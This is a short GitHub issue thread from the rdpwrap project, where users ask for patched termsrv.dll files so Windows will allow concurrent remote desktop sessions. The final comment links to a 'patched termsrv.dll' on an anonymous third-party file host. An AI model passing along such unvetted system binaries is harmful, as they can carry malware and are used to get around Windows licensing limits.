### ISSUE TITLE
termsrv.dll for Windows 11 Enterprise 21H2 22000.1696

### ISSUE THREAD

**Issue by duanloves** [stascorp/rdpwrap#2150] opened 2023-03-21 06:29 UTC
Can i get a patched version of termsrv.dll for this build please.
Windows 11 Enterprise 21H2 22000.1696
[termsrv.zip](https://github.com/stascorp/rdpwrap/files/11025457/termsrv.zip)

**Comment by sashaqwert** [comment] 2023-03-21 07:44
> Windows 11 Enterprise 21H2 22000.1696
> [termsrv.zip](https://github.com/stascorp/rdpwrap/files/11025457/termsrv.zip)

`termsrv.dll` version != Windows version.

<details>
<summary>File properties</summary>

![изображение](https://user-images.githubusercontent.com/24974508/226544105-44c80fb9-1594-494c-9576-712a3f324c81.png)


</details>

Your version is `10.0.22000.1641`

**Comment by sashaqwert** [comment] 2023-03-21 07:45
Duplicate of https://github.com/stascorp/rdpwrap/issues/2126

**Closed as not planned by sashaqwert** 2023-03-21 07:45 UTC
Labels: duplicate

**Comment by WARLo0RD** [comment] 2023-11-15 09:27
Patched termsrv.dll https://filespace.com/dva2zxcnwgp7 for the version Windows Server 2022
